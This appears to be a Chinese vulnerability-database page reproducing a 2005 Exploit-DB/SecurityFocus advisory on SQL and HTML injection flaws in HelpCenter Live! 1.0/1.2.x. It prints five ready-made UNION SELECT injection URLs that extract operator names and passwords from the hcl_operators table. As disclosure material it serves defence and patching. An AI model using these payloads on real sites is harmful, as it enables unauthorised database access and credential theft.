HelpCenter Live! 1.0/1.2.x – Multiple Input Validation Vulnerabilities

HelpCenter Live! 1.0/1.2.x – Multiple Input Validation Vulnerabilities

漏洞ID 1055127 漏洞类型
发布时间 2005-05-24 更新时间 2005-05-24
图片[1]-HelpCenter Live! 1.0/1.2.x – Multiple Input Validation Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-HelpCenter Live! 1.0/1.2.x – Multiple Input Validation Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25683
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13666/info

Help Center Live is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Reportedly the application is affected by multiple HTML injection vulnerabilities. Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

The application is also affected by multiple SQL injection vulnerabilities. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

These issues have reportedly been addressed in the latest release of Help Center Live, this information has not been confirmed by Symantec or the vendor. 

http://www.example.com/support/faq/index.php?x=f&id=-99'%20UNION%20SELECT%200,
0,operator,password%20FROM%20hcl_operators%20WHERE%201/*

http://www.example.com/support/tt/view.php?tid=-99'%20UNION%20SELECT%200,0,0,
operator,password,0,0,0,0,0%20FROM%20hcl_operators%20WHERE%201/*

http://www.example.com/support/tt/download.php?fid=-99'%20UNION%20SELECT%200,0,0,
password,0,operator,0,0%20FROM%20hcl_operators%20WHERE%20id='1

http://www.example.com/support/lh/icon.php?status=-99' UNION SELECT
password,password FROM hcl_operators WHERE id=1/*

http://www.example.com/support/lh/chat_download.php?fid=-99' UNION
SELECT password,operator,password FROM hcl_operators WHERE id=1/*

相关推荐: Mambo Open Source 4.5 – ‘index.php?mos_change_template’ Cross-Site Scripting

Mambo Open Source 4.5 – ‘index.php?mos_change_template’ Cross-Site Scripting 漏洞ID 1054427 漏洞类型 发布时间 2004-03-16 更新时间 2004-03-16 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享